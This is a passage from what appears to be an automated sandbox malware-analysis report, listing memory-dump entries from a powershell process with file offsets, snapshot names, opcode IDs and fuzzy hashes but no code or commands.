                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb845c0f944e13f6b2456aa0f99eb36db2018cc1ae34e8e35f7609d43439a7f9
                                                        • Instruction ID: 427a3ac81ff23b1392765425ec18aefc6dedc5d4ef28aad1fe8f52f86cf0e976
                                                        • Opcode Fuzzy Hash: fb845c0f944e13f6b2456aa0f99eb36db2018cc1ae34e8e35f7609d43439a7f9
                                                        • Instruction Fuzzy Hash: 5D4137B2B00225DBCF249B6988406AEF7F5AFC8610B14C16AD96ADB240DB31DD01C7E3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7829d20f6abfdc2b775a407e8f3ae2449d6659bebce80e596c042d6b7dc2c729
                                                        • Instruction ID: a1554cc9170be919638814f1d6a40c3553aca84fca503a4fdf90b2fc845879be
                                                        • Opcode Fuzzy Hash: 7829d20f6abfdc2b775a407e8f3ae2449d6659bebce80e596c042d6b7dc2c729
                                                        • Instruction Fuzzy Hash: C9513C35A00249CFDB04CF69C494ADEBBB6FF89314F148168D841AB395D734ED86CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 516af18f6b547cc3e690f087bb11338c38ced6b6545dbb84f7d38319f1efa73c
                                                        • Instruction ID: 93cb4867204eff9f980ebd457fdc7c8e7e21a3ccd0357c492d6cf31cc68edf85
                                                        • Opcode Fuzzy Hash: 516af18f6b547cc3e690f087bb11338c38ced6b6545dbb84f7d38319f1efa73c
                                                        • Instruction Fuzzy Hash: 44416634B012049FDB48DFB9C454BAEB6F7EFC8310F14C069D849AB755CA75AC428BA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01cdaed8968a1d3218fead8ebbac244d21548d2159ebb8aafdb3a7b0ef0872af
                                                        • Instruction ID: c3b9484fdd428fb56c0c7939ffef616b870c08e33e2a1ff8079b244a02439f1a
                                                        • Opcode Fuzzy Hash: 01cdaed8968a1d3218fead8ebbac244d21548d2159ebb8aafdb3a7b0ef0872af
                                                        • Instruction Fuzzy Hash: B5412C74A115199FCB04DF9CC980AAEBBB2FF48320F648259E954EB3A0D735EC51CB94
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a02bf9815c0e3cbc56d69edb996d07c1f134e0cec636aca3c7d34b6f15f2d038
                                                        • Instruction ID: 521bd1ab17f99917bb9bb6b7d5b5b6df9a08771d87baab57724d90193d16cf34
                                                        • Opcode Fuzzy Hash: a02bf9815c0e3cbc56d69edb996d07c1f134e0cec636aca3c7d34b6f15f2d038
                                                        • Instruction Fuzzy Hash: 30414F74A016099FCB05DF9CC980AAEBBB2FF48320F248259E954EB390D735EC51CB90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f46d5a6654dfca306e5aa0adb072e3e3edb3fa097f44e6742a3db9ac60975ab
                                                        • Instruction ID: b5c5a99b7f8b114211afb6c1b2f75291a51920dc80d2692b3da4e96e3a0e4d89
                                                        • Opcode Fuzzy Hash: 2f46d5a6654dfca306e5aa0adb072e3e3edb3fa097f44e6742a3db9ac60975ab
                                                        • Instruction Fuzzy Hash: 78412970A115099FCB05DF9CC4819AEBBF2FF48310F248259E955EB3A0D735AC52CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f5833801b9dbef0a019024e777c9886fedbc94126848f2d761eb696bfe1f135
                                                        • Instruction ID: efdc390b24c522a7a0e19d12f324330e2bd0beee6428dc8946526a09d0c9d4ae
                                                        • Opcode Fuzzy Hash: 0f5833801b9dbef0a019024e777c9886fedbc94126848f2d761eb696bfe1f135
                                                        • Instruction Fuzzy Hash: F53127F4B40212DFCF248F548900B7A7BE6BFD5650F448169E91A9F294E732CD81CB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4d44bb7f3601ca24fc812fdfba7035bdb0a9d4695c0d8af20e7a24595d7d139
                                                        • Instruction ID: 65db52eaaa62edcf5c3efb396d6d3e6771349848d533f67632e340dfebe37c85
                                                        • Opcode Fuzzy Hash: d4d44bb7f3601ca24fc812fdfba7035bdb0a9d4695c0d8af20e7a24595d7d139
                                                        • Instruction Fuzzy Hash: 28415A74A002099FCB05CF59C498DEAFBB1FF49310B228699D945AB365C736FC52CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f3fe7cdf58c487ef85cc05b3a351156e93819a57cb7eb8511df2ce416ffef0d
                                                        • Instruction ID: dd672393aa4b10a7d67a4e2bd9de1fe6a8f08c99b9b0c562bb1cf577f6289f9e
                                                        • Opcode Fuzzy Hash: 1f3fe7cdf58c487ef85cc05b3a351156e93819a57cb7eb8511df2ce416ffef0d
                                                        • Instruction Fuzzy Hash: DF31E5B4B01214AFD708ABB4C811FAE76A3DFC5714F10D029E905AF794CF7AAC418B95
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1fdc16e30794a7f2e9ad5754896dd0bcb617d02eafe62d6b446bf14d7650130a
                                                        • Instruction ID: 0b53f6b948f88d6fef2cc58c92d6540ee45d67fd3609df9e1c3c085f82aef1b6
                                                        • Opcode Fuzzy Hash: 1fdc16e30794a7f2e9ad5754896dd0bcb617d02eafe62d6b446bf14d7650130a
                                                        • Instruction Fuzzy Hash: B7314B75A0060A9FCB04CF5DC5819A9FBF2FF49310B258299E949A7751C731FD92CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2de3430093159ee8ba8d94d791ee028412a49cfc57827d0041ae2fb6e427de38
                                                        • Instruction ID: 7f2647e46c8112fb48c01abd26e77593ce62fbda68f6b293144f58504da85d63
                                                        • Opcode Fuzzy Hash: 2de3430093159ee8ba8d94d791ee028412a49cfc57827d0041ae2fb6e427de38
                                                        • Instruction Fuzzy Hash: 0C313974A006099FCB04CF59C5819AAFBF2FF49310B258299E999EB751C731FC52CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7fb82a4d3547d4b9a979941b4ff5d4145cc585bea8fa046495b0173c3e062a9
                                                        • Instruction ID: 4f8604b1c1eae91afa93ebc53d7d376b006f4fa535bbe9416a0f8eb8543683a9
                                                        • Opcode Fuzzy Hash: e7fb82a4d3547d4b9a979941b4ff5d4145cc585bea8fa046495b0173c3e062a9
                                                        • Instruction Fuzzy Hash: 52316C70A015059FCB14DF98C9919AEFBF1FF48310B248299E959EB791C735EC91CB90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4e4d3495f457eff163ee46fe0b6cbd9e9718a3c97fe10225a57b1ebf11352e7
                                                        • Instruction ID: 8777bf527ee00828e87a6720f9a14856fe6548bb3abb9007a90c09d1ca50b491
                                                        • Opcode Fuzzy Hash: b4e4d3495f457eff163ee46fe0b6cbd9e9718a3c97fe10225a57b1ebf11352e7
                                                        • Instruction Fuzzy Hash: 3C2102F8705342DFCB119B2488407BA7FB1AFD2640F0840A6D966DF282D77E8D45CB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c11825e49b2da52b77705af49a24bdc17012f9efba12bf4446fb18d9289abe6
                                                        • Instruction ID: 527a0598126b9be2e08e33043acd5ccbba2eae511a4d691b94b47d2206509a7f
                                                        • Opcode Fuzzy Hash: 7c11825e49b2da52b77705af49a24bdc17012f9efba12bf4446fb18d9289abe6
                                                        • Instruction Fuzzy Hash: 4E21EAB6A05356DFCF115B29C5401A5FBF0EF8A11072581D6C8AADB292DB30DD05C7E3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3151e5d84e9b0f2a9d861ddef77e51a872bab5ea606bfecdbab228c9fc023f0
                                                        • Instruction ID: f2d7a414a6d5d746830a7fed4cfb8187a2ba4e528b4767a214f4b7939493ed5b
                                                        • Opcode Fuzzy Hash: e3151e5d84e9b0f2a9d861ddef77e51a872bab5ea606bfecdbab228c9fc023f0
                                                        • Instruction Fuzzy Hash: C431BC74E056448EDB60CF6AD4887CAFFF2EF89324F28C05ED88997215C6746882CF91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aab334e581b3ea7777c4ddcf1891d68d6f78bf9047a0cc5a1828273ddc01523d
                                                        • Instruction ID: 59af08e21af33309e66b5ab87f88a479725aa238fc588268f0f8b44a8730d044
                                                        • Opcode Fuzzy Hash: aab334e581b3ea7777c4ddcf1891d68d6f78bf9047a0cc5a1828273ddc01523d
                                                        • Instruction Fuzzy Hash: CB21E275600244EFDF45CF14D9C4F26BF62EB88314F24C5ADFA094A296C736E456CB61
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 461fed994af1ae9fa95f54e6a54779d76fea68e8f8c2790da9d4d16bb22c7200
                                                        • Instruction ID: 323322760238a46fdedadd380769e2e855191e5530a991aa4f283763b6228e7f
                                                        • Opcode Fuzzy Hash: 461fed994af1ae9fa95f54e6a54779d76fea68e8f8c2790da9d4d16bb22c7200
                                                        • Instruction Fuzzy Hash: 87215B3270524A4ECB259668E8615EAF7A9BF91320F20C07FDAB5CB342DA358406C793
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 119af5b5f2548fa48bdfc9ee166a56004c648cbd787bbfdf58fc5f7a963d41e7
                                                        • Instruction ID: 673792051ead38b23efcd40fe7faa798ceb272d3e41ab360c8fae87028613c9e
                                                        • Opcode Fuzzy Hash: 119af5b5f2548fa48bdfc9ee166a56004c648cbd787bbfdf58fc5f7a963d41e7
                                                        • Instruction Fuzzy Hash: 4D1159F5341301EBDB28261419003BA7BA69BF1A91F085025DA13CF785CBBECC85C752
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4a2672e873c75f90f08f1b53a98ed7b08bafea223b3a60980afafd0f9142cd7
                                                        • Instruction ID: fda659ff4576b0c90ec5e8772be7956c80034747c5ce5cf64f2c4f8713c4349c
                                                        • Opcode Fuzzy Hash: d4a2672e873c75f90f08f1b53a98ed7b08bafea223b3a60980afafd0f9142cd7
                                                        • Instruction Fuzzy Hash: 29218C76504284DFDF06CF14D9C4B16BF62FB48314F24C6AEE9094A696C33AD46ACB91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dabb0f74daaccfc56ddc534574949198bb580785631d0c2ee230d61058404729
                                                        • Instruction ID: 7528a1be1017ce128722c17f7d6797308caaa8d146bdb3ded82c3ae1743b5b6a
                                                        • Opcode Fuzzy Hash: dabb0f74daaccfc56ddc534574949198bb580785631d0c2ee230d61058404729
                                                        • Instruction Fuzzy Hash: E60196357052844FCB069B79A4984AD7FA2DFDA221325409EE543CB353DFB89C06C756
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1222e2d7bdaf32e45dd5a469ae5831d74f3cf7612a968624fc8078da0001811c
                                                        • Instruction ID: fe363b441e6760e6e909e97812333a9950e53dc636da2f659b79c931e6d53e6e
                                                        • Opcode Fuzzy Hash: 1222e2d7bdaf32e45dd5a469ae5831d74f3cf7612a968624fc8078da0001811c
                                                        • Instruction Fuzzy Hash: CB012B313083802BD7199779EC50B9E7F53AFC2614F5485ADD5865F292C9A17C0987A1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280019855.0000000004ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ACD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4acd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 207cea89ebd53f7429e4809acbd345aa7d246d32229131b8ba358eeba116fa01
                                                        • Instruction ID: c89326075db588055f8c81dc757389729de3ef986055a16c93f71cb1a504e50b
                                                        • Opcode Fuzzy Hash: 207cea89ebd53f7429e4809acbd345aa7d246d32229131b8ba358eeba116fa01
                                                        • Instruction Fuzzy Hash: 1901A271505340AAF7608F2EEC84B67BFE8DF41334F18C13EED4A5A246D679A846C6B1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f513c7d0c0b90c48d34905791f20e1820ec5b742276b7c22ee9c6ee134211d4